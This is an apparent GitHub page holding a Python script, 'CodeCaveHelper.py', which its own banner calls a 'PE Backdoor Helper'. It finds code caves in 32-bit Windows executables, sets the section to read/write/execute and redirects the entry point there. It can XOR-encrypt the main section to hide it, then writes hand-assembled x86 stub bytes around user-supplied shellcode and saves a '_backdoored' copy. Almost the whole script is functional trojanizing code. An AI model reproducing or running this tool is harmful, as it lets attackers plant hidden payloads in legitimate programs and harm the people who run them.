-
Notifications
You must be signed in to change notification settings - Fork 5
/
CodeCaveHelper.py
434 lines (297 loc) · 13.3 KB
/
CodeCaveHelper.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
import pefile
import struct
import argparse
import sys
import os
class tcolors:
clear = "\033[0m"
green = "\033[32m"
red = "\033[31m"
yellow = "\033[33m"
blue = "\033[34m"
gray = "\033[90m"
def success(message):
print(f"[\033[32m✓\033[39m] {message}")
def error(message):
print(f"\033[31m{message}\033[39m")
def debug(message):
print(f"[\033[34m*\033[39m] {message}")
def warning(message):
print(f"[\033[33m!\033[39m] {message}")
def title(title):
print("\n" + ("=" * 45))
print(f" {title}")
print("=" * 45)
def bytearr_to_bytestr(data):
return ''.join(f"\\x{'{:02x}'.format(x)}" for x in data)
def bytestr_to_bytearr(data):
return list(bytearray.fromhex(data.replace("\\x", " ")))
class CodeCave:
"""
Class containing information about a found code cave
"""
def __init__(self, name, section, offset, size, cave_type):
self.name = name
self.section = section
self.offset = offset
self.size = size
self.type = cave_type
def get_section_by_address(address):
for section in pe.sections:
section_begin_address = (image_base + section.VirtualAddress)
section_end_address = (section_begin_address + section.SizeOfRawData)
if (address >= section_begin_address) and (address <= section_end_address):
return section
return None
def get_section_name(section):
"""
Return the name of a PE Section and strip for extra zeroes
A section name is always equal to zero bytes and padded with zeros.
"""
if not section:
return ""
return section.Name.decode("utf-8").strip('\0').lower()
def define_section_rwe(section):
"""
Update section flag to Execute | Read | Write -> 0xE0000020
"""
flags = 0xe0000020
if section.Characteristics != flags:
debug(f"Section flags updated from {hex(section.Characteristics)} to {hex(flags)} (READ / WRITE / EXECUTE)")
section.Characteristics = flags
def code_cave_finder(section, cave_opcode):
"""
Find a succession of x NOP's or a succession of x NULL Bytes in a section.
To be consired as a code cave, buffer space must be at least equal or above 50 Bytes.
Section must be executable in order to host our payload.
"""
name = get_section_name(section)
if len(search_in_sections) > 0:
if not name in search_in_sections:
return False
offset = section.VirtualAddress
section_data = pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData]
cave_length = 0
for index, b in enumerate(section_data, start=1):
if (b == cave_opcode):
cave_length += 1
if ((b != cave_opcode) and (cave_length > 0)) or (index == len(section_data)):
if cave_length >= argv.cave_min_size:
cave = CodeCave(name, section, (index - cave_length), cave_length, cave_opcode)
code_caves.append(cave)
cave_length = 0
return True
def encrypt_section(section, xor_key):
"""
Encrypt whole PE Section using a basic XOR Encoder (4 Bytes Key)
"""
offset = section.VirtualAddress
section_data = bytearray(pe.get_memory_mapped_image()[offset:offset + section.SizeOfRawData])
for index, b in enumerate(section_data):
section_data[index] = b ^ xor_key # b ^ (index % 256)
pe.set_bytes_at_offset(section.PointerToRawData, bytes(section_data))
def get_rel_distance(origine, destination):
"""
Retrieve the relative distance between two locations.
location is relative to image_base
"""
origine += image_base
destination += image_base
distance = 0x0
if origine > destination:
distance = (0x0 - (origine - destination)) & 0xffffffff
else:
distance = (destination - origine)
return distance
'''
-------------------------------------------------------------------------------------------------------
Entry Point
-------------------------------------------------------------------------------------------------------
'''
if __name__ == "__main__":
search_in_sections = [] # [] = All Sections
try:
argument_parser = argparse.ArgumentParser(description=f"PE Backdoor Helper by {tcolors.blue}@DarkCoderSc{tcolors.clear}")
argument_parser.add_argument('-f', '--file', type=str, dest="file", action="store", required=True, help="Valid PE File location (Ex: /path/to/calc.exe).")
argument_parser.add_argument('-p', '--payload', type=str, dest="payload", action="store", required=False, default="", help="Shellcode Payload (Example: \"\\x01\\x02\\x03...\\x0a\").")
argument_parser.add_argument('-x', '--encrypt', dest="encrypt_main_section", action="store_true", required=False, default=False, help="Encrypt main section (entry point section).")
argument_parser.add_argument('-k', '--encryption-key', type=str, dest="encryption_key", action="store", required=False, default="\\x0c", help="Define custom encryption key (1 Byte only).")
argument_parser.add_argument('-c', '--cave-opcodes', type=str, dest="cave_opcodes", action="store", default="\\x00\\x90", help="Define code opcode list to search for.")
argument_parser.add_argument('-s', '--cave-min-size', type=int, dest="cave_min_size", action="store", default=50, help="Minimum size of region to be considered as code cave.")
argument_parser.add_argument('-e', '--egg', type=str, dest="egg", action="store", required=False, default="egg!", help="Define a custom egg name (ESP Restore Mechanism)")
try:
argv = argument_parser.parse_args()
except IOError as e:
parser.error()
if not argv.encrypt_main_section and (len(argv.payload) == 0):
raise Exception("You must either define a payload or decide to encrypt main section of target file in order to find this tool useful.")
try:
shellcode = bytestr_to_bytearr(argv.payload)
cave_opcode = bytestr_to_bytearr(argv.cave_opcodes)
encryption_key = bytestr_to_bytearr(argv.encryption_key)
except:
raise Exception("Malformed byte string. A byte string must be defined with the following format: \"\\x01\\x02\\x03...\\x0a\".")
if len(encryption_key) > 1:
raise Exception("Encryption key must be equal to 1 byte. Example: \"\\x0c\"")
debug(f"Loading PE File: {tcolors.blue}\"{argv.file}\"{tcolors.clear}")
pe = pefile.PE(argv.file, fast_load=False)
image_base = pe.OPTIONAL_HEADER.ImageBase
entry_point_address = pe.OPTIONAL_HEADER.AddressOfEntryPoint
if pe.FILE_HEADER.Machine != pefile.MACHINE_TYPE["IMAGE_FILE_MACHINE_I386"]:
raise Exception("This script is not compatible with x86-64 PE Files.")
debug(f"Image Base: {tcolors.blue}{hex(image_base)}{tcolors.clear}")
debug(f"Entry Point: {tcolors.blue}{hex(entry_point_address)}{tcolors.clear}")
#
# Enumerate Code Caves in Executable Sections
#
code_caves = []
if len(cave_opcode) == 0:
raise Exception(f"You must specify at least one code cave opcode (Ex: {tcolors.blue}\\x00\\x90{tcolors.clear}")
debug("Searching for code caves...")
for section in pe.sections:
debug(f"Scanning {tcolors.blue}\"{get_section_name(section)}\"{tcolors.clear}, " \
f"VirtualOffset=[{hex(section.VirtualAddress)}], RawOffset=[{hex(section.PointerToRawData)}], " \
f"Size=[{hex(section.SizeOfRawData)}], Characteristics=[{hex(section.Characteristics)}]")
for opcode in cave_opcode:
code_cave_finder(section, opcode)
#
# List found code caves
#
if len(code_caves) == 0:
warning("No code cave present in target file.")
else:
title("Code Cave Results")
for index, cave in enumerate(code_caves):
print(f"({tcolors.green}{index +1}{tcolors.clear}) Code cave in section=[{tcolors.blue}{cave.name}{tcolors.clear}], "\
f"relative_offset=[{hex(cave.offset)}], cave_size=[{hex(cave.size)}], cave_type=[{hex(cave.type)}]")
#
# Select desired code cave for payload injection
#
cave = None
while True:
print(f"\nEnter desired code cave index for code injection (CTRL+C to abort): ", end="")
try:
choice = int(input())
if (choice < 1) or (choice > len(code_caves)):
continue
cave = code_caves[choice -1]
break
except KeyboardInterrupt:
raise Exception("\nExecution aborted.")
except:
continue
if not cave:
raise Exception("Unexpected error.")
debug("Checking if cave section has correct flags set...")
define_section_rwe(cave.section)
debug("Retrieve section of entrypoint...")
entry_section = get_section_by_address(image_base + entry_point_address)
if not entry_section:
raise Exception("Could not find section of entrypoint...")
success(f"Entrypoint is located in {get_section_name(entry_section)}.")
new_entry_point_address = (cave.section.VirtualAddress + cave.offset)
debug(f"Patch entrypoint address with code cave address: {hex(entry_point_address)} to {hex(new_entry_point_address)}.")
pe.OPTIONAL_HEADER.AddressOfEntryPoint = new_entry_point_address
#
# Start Encryption Mechanisms
#
if argv.encrypt_main_section:
debug("Prepare main section (entrypoint section) encryption...")
define_section_rwe(entry_section)
debug("Start encryption....")
encrypt_section(entry_section, encryption_key[0])
success("Main section successfully encrypted.")
debug("Carving code cave payload...")
#
# Prologue
#
debug("Writing code cave prologue: saving registers, flags, ESP recovery mechanism...")
# Save registers and flags
payload = b""
payload += b"\x60" # pushad
payload += b"\x9C" # pushfd
# Place eggs to recover stack state (restore ESP to original and expected value)
egg = argv.egg.encode('ascii')[::-1]
payload += ((b"\x68" + egg) * 2) # egg!egg!
#
# Decryption Routine (If encryption was requested)
#
if argv.encrypt_main_section:
debug("Writing code cave decryption routine to decrypt main section...")
payload += b"\xe8\x00\x00\x00\x00" # call (next_instruction) and save EIP to ESP
payload += b"\x5e" # pop esi
payload += b"\x83\xee" # sub esi, (payload_length)
payload += struct.pack("B", len(payload)- 3) # -3 because we don't count two last instructions
payload += b"\x56" # push esi
payload += b"\x5f" # pop edi
payload += b"\x81\xc7" # add edi, (size of cave)
payload += struct.pack("<I", cave.size) # size of cave in Little Endian
payload += b"\x56" # push esi
payload += b"\x58" # pop eax
origine_offset = image_base + cave.section.VirtualAddress + cave.offset
destination_offset = image_base + entry_section.VirtualAddress
if origine_offset > destination_offset:
payload += b"\x2d" # sub eax, ????????
payload += struct.pack("<I", (origine_offset - destination_offset))
else:
payload += b"\x05" # add eax, ????????
payload += struct.pack("<I", (destination_offset - origine_offset))
payload += b"\x50" # push eax
payload += b"\x5b" # pop ebx
payload += b"\x81\xc3" # add ebx, (main section start + end)
payload += struct.pack("<I", entry_section.SizeOfRawData)
payload += b"\x3b\xc6" # cmp eax, esi
payload += b"\x7c\x04" # jl (xor routine)
payload += b"\x3b\xc7" # cmp eax, edi
payload += b"\x7c\x03" # jl (inc eax)
payload += b"\x80\x30" # xor byte [eax], (xor_key_byte)
payload += struct.pack("B", encryption_key[0])
payload += b"\x40" # inc eax
payload += b"\x3b\xc3" # cmp eax, ebx
payload += b"\x75\xf0" # jne (cmp eax, esi)
#
# Insert Shellcode
#
if argv.payload:
debug(f"Writing shellcode payload, size=[{hex(len(shellcode))}]...")
payload += bytes(shellcode)
#
# Epilogue (Restore ESP, registers, entrypoint)
#
debug("Writing code cave epilogue: restore ESP, flags, registers and jump back to original entrypoint...")
# restore ESP
payload += b"\xb8" + egg # mov eax, "egg"
payload += b"\x54" # push esp
payload += b"\x5f" # pop edi
payload += b"\xaf" # scasd
payload += b"\x75\x0c" # jnz _pop_ebx
payload += b"\xaf" # scasd
payload += b"\x75\x09" # jnz _pop_ebx
payload += b"\x57" # push edi
payload += b"\x5c" # pop esp
# Restore Registers
payload += b"\x9D" # popfd
payload += b"\x61" # popad
instruction_size = 5 # bytes (0xe9/jmp) 0x???????? (Little Endian)
from_offset = cave.section.VirtualAddress + cave.offset + len(payload) + instruction_size
jmp_to_offset = get_rel_distance(from_offset, entry_point_address)
# Jump back to original entrypoint
payload += b"\xe9" # jmp
payload += struct.pack("<I", jmp_to_offset) # ????????
# Part of ESP restoration
payload += b"\x5b" # pop ebx
payload += b"\xeb\xee" # jmp _push_esp
#
# Write Final Payload to Section
#
if len(payload) > cave.size:
error("Cave size is too small to be used with your payload.")
else:
pe.set_bytes_at_offset((cave.section.PointerToRawData + cave.offset), payload)
file_info = os.path.splitext(argv.file)
output_file = f"{file_info[0]}_backdoored{file_info[1]}"
success(f"Success! backdoored version location: \"{output_file}\".")
pe.write(output_file)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
error(f"{str(e)}, line=[{exc_tb.tb_lineno}]")